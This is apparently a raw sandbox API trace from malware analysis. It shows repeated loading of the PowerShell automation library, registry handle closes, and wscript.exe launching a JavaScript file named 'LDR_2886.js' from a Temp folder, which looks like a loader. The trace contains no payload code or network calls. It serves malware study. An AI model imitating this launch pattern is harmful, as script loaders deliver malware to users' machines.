	[0229.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0244.125] VirtualQuery (in: lpAddress=0x17bb30, lpBuffer=0x17c9f0, dwLength=0x30 | out: lpBuffer=0x17c9f0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0244.130] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.130] CoTaskMemFree (pv=0x42df80) 
	[0244.139] VirtualQuery (in: lpAddress=0x17bb30, lpBuffer=0x17c9f0, dwLength=0x30 | out: lpBuffer=0x17c9f0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0244.592] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.592] CoTaskMemFree (pv=0x42df80) 
	[0244.595] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.596] CoTaskMemFree (pv=0x42df80) 
	[0244.598] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.598] CoTaskMemFree (pv=0x42df80) 
	[0244.605] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.605] CoTaskMemFree (pv=0x42df80) 
	[0244.610] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.610] CoTaskMemFree (pv=0x42df80) 
	[0244.611] CoTaskMemAlloc (cb=0x104) returned 0x42df80
	[0244.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0244.611] CoTaskMemFree (pv=0x42df80) 
	[0244.617] VirtualQuery (in: lpAddress=0x17bb30, lpBuffer=0x17c9f0, dwLength=0x30 | out: lpBuffer=0x17c9f0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0244.620] VirtualQuery (in: lpAddress=0x17bb30, lpBuffer=0x17c9f0, dwLength=0x30 | out: lpBuffer=0x17c9f0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.978] VirtualQuery (in: lpAddress=0x17bb30, lpBuffer=0x17c9f0, dwLength=0x30 | out: lpBuffer=0x17c9f0*(BaseAddress=0x17b000, AllocationBase=0x100000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42df80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.375] CoTaskMemFree (pv=0x42df80) 
	[0252.203] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x42e3c0
	[0258.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e5e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.678] CoTaskMemFree (pv=0x42e5e0) 
	[0259.019] CoTaskMemAlloc (cb=0x104) returned 0x42e5e0
	[0259.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x42e5e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.019] CoTaskMemFree (pv=0x42e5e0) 
	[0259.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 342
	os_tid = 0xcec


Thread:
	id = 343
	os_tid = 0xcf0


Thread:
	id = 344
	os_tid = 0xcf4


Thread:
	id = 345
	os_tid = 0xcf8


Thread:
	id = 346
	os_tid = 0xcfc


Thread:
	id = 347
	os_tid = 0xd00

	[0126.378] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0150.355] RegCloseKey (hKey=0x32c) returned 0x0
	[0150.356] LocalFree (hMem=0x3a38f0) returned 0x0
	[0150.356] CloseHandle (hObject=0x320) returned 1
	[0150.356] CloseHandle (hObject=0x13) returned 1
	[0150.357] CloseHandle (hObject=0xf) returned 1
	[0150.357] RegCloseKey (hKey=0x30c) returned 0x0
	[0150.357] RegCloseKey (hKey=0x308) returned 0x0
	[0150.357] RegCloseKey (hKey=0x304) returned 0x0
	[0150.357] LocalFree (hMem=0x3a38c0) returned 0x0
	[0170.780] RegCloseKey (hKey=0x1c8) returned 0x0
	[0212.736] RegCloseKey (hKey=0x35c) returned 0x0
	[0212.736] RegCloseKey (hKey=0x358) returned 0x0
	[0212.737] RegCloseKey (hKey=0x354) returned 0x0
	[0212.737] RegCloseKey (hKey=0x350) returned 0x0
	[0212.737] RegCloseKey (hKey=0x34c) returned 0x0
	[0212.737] RegCloseKey (hKey=0x370) returned 0x0
	[0212.738] RegCloseKey (hKey=0x33c) returned 0x0
	[0212.738] RegCloseKey (hKey=0x338) returned 0x0
	[0212.738] RegCloseKey (hKey=0x334) returned 0x0
	[0212.841] RegCloseKey (hKey=0x330) returned 0x0
	[0212.841] RegCloseKey (hKey=0x32c) returned 0x0
	[0212.841] RegCloseKey (hKey=0x320) returned 0x0
	[0212.841] RegCloseKey (hKey=0x30c) returned 0x0
	[0212.842] RegCloseKey (hKey=0x36c) returned 0x0
	[0212.842] RegCloseKey (hKey=0x1cc) returned 0x0
	[0212.842] RegCloseKey (hKey=0x2e4) returned 0x0
	[0212.842] RegCloseKey (hKey=0x348) returned 0x0
	[0212.842] RegCloseKey (hKey=0x374) returned 0x0
	[0212.843] RegCloseKey (hKey=0x364) returned 0x0
	[0212.843] RegCloseKey (hKey=0x360) returned 0x0
	[0252.912] RegCloseKey (hKey=0x320) returned 0x0
	[0252.912] RegCloseKey (hKey=0x30c) returned 0x0
	[0252.913] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.913] RegCloseKey (hKey=0x1cc) returned 0x0
	[0252.913] RegCloseKey (hKey=0x2e4) returned 0x0
	[0252.913] RegCloseKey (hKey=0x368) returned 0x0
	[0252.913] RegCloseKey (hKey=0x32c) returned 0x0
	[0252.914] RegCloseKey (hKey=0x374) returned 0x0
	[0252.914] RegCloseKey (hKey=0x364) returned 0x0
	[0252.914] RegCloseKey (hKey=0x360) returned 0x0

Process:
	id = "45"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0xf666000"
	os_pid = "0xd50"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 355
	os_tid = 0xd54

	[0142.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31f740 | out: lpSystemTimeAsFileTime=0x31f740*(dwLowDateTime=0xcd0c8000, dwHighDateTime=0x1d543d1)) 
	[0142.477] GetCurrentProcessId () returned 0xd50
	[0142.477] GetCurrentThreadId () returned 0xd54
	[0142.477] GetTickCount () returned 0x33cff
	[0142.477] QueryPerformanceCounter (in: lpPerformanceCount=0x31f748 | out: lpPerformanceCount=0x31f748*=26690322788) returned 1
	[0142.477] GetStartupInfoA (in: lpStartupInfo=0x31f760 | out: lpStartupInfo=0x31f760*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0142.477] GetModuleHandleA (lpModuleName=0x0) returned 0xff1f0000
	[0142.478] GetModuleHandleA (lpModuleName=0x0) returned 0xff1f0000
